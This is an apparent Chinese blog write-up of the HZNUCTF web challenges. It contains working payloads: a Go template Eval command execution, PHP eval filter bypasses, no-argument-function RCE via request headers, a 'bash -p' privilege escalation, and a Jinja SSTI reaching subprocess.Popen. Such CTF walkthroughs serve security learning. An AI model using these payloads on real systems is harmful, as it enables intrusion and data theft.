HZNUCTF -- web

HZNUCTF第五届校赛实践赛初赛 Web方向 WriteUp-CSDN博客

ezssti

下载文件

访问 /login

可由源代码中看到 Eval 函数 ,可以任意命令执行

按照格式,可执行命令

POST :name={{.Eval "env"}} 可以得到flag

(尝试ls 只能列出当前目录,列不出根目录,无法cat ,所以尝试 env命令)

真亦假,假亦真(HZNU版)

eval($_POST[1]) 可以命令执行

但是 cat /flag 会显示出一个假的flag

尝试了特别久,找了很多目录文件都没有
cat /*g 可以找到真的flag ,

是做了一个类似前端的验证啥的,只要出现了 flag 或者 /f* 啥的就会返回那个假的的flag

sql2login

可能是题目有问题,直接注册账号再登陆就可以直接得到flag

不需要sql注入

suid

php 复制代码
 <?php
highlight_file(__FILE__);// var_dump($_POST);if (isset($_POST["s_1.1"])) {
    echo "level 1"."<br>";
    if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_POST['cmd'])) {
        if (!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i', $_POST['cmd'])) {
            echo 'success!'.'<br data-tomark-pass>';
            eval($_POST['cmd']);
        }
    }
} else {
    echo "nonono 1";
} nonono 1

无参数函数进行命令执行

抓包处理

POST传参:
s[1.1=&cmd=eval(pos(apache_request_headers()));

bp抓包后构造一个请求头,放在第一个,名字随便

比如:flag:system("");

这样包裹了eval 就可以进行命令执行了

解释:

要传参 s_1.1 因为php特性的关系,正常传不了 点号 .

,需要特殊处理 ,[ 就被转换成 _ ,且后面的 点号 . 也可以正常传了

所以 传参 s_1.1 写为 --> s[1.1

apache_request_headers() : 会返回请求头的信息

pos() : 会把第一个信息取出来回显

eval() : 可将回显出来的信息当作代码执行

但是这道题可以列出来目录,无法读取文件,没有权限,需要提权

看了wp后,提权,只需要加上**bash -p -c ,**就可以拥有权限读取文件了

php 复制代码
请求头:
A: bash -p -c "cat /flag"


传参:
cmd=system(current(array_reverse(getallheaders())));&s[1.1=1

炼狱waf-S

尝试好久,太菜了,一直绕不过去

直接看wp学习:

1、利用subprocess.Popen来执行命令

{{\[\].class.base.subclasses()351('cat /proc/1/en*',shell=True,stdout=-1).communicate()0.strip()}}

2、直接利用引号拼接(非预期解)

(我开始做的时候也是想拼接绕过来着,一直没成功,感觉应该是格式的问题,失败了几次也就直接放弃了,感觉不会这么简单的直接就是引号拼接)

相关推荐
·醉挽清风·16 分钟前
学习笔记—算法—算法题
笔记·学习·算法
西岸行者37 分钟前
硬刚DeepSeek: UDPC与MTFAA的血缘辩论
笔记
a11177643 分钟前
机器人导航入门指南(从 0 到 1)
笔记·学习·slam
Nebula_g1 小时前
大模型应用技术速通笔记
笔记·深度学习·机器学习·大模型
范什么特西2 小时前
每日学习-01
学习
旺仔丶歪歪乐2 小时前
英语启蒙APP分级体系拆解:本土课标分级与海外原版分级有什么区别
人工智能·学习·web app
xian_wwq2 小时前
【学习笔记】开源 vs 闭源:Llama / Qwen / DeepSeek 生态博弈(34/35)
笔记·学习·开源
振浩微433射频芯片2 小时前
5个IO控制20个LED?查理复用实战拆解
网络·单片机·物联网·学习·智能家居
浩瀚地学2 小时前
【面试算法笔记】0302-哈希表-哈希表实现
java·经验分享·笔记·算法·面试
hj2862513 小时前
K8S 核心组件与资源概念 + 带注释命令 + 实操案例版笔记
笔记·容器·kubernetes